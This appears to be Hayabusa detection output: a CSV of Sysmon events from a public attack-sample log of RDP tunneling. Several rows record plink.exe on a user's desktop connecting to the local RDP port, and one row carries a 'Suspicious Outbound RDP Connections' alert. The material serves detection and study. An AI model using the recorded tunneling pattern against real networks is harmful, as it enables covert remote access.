2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
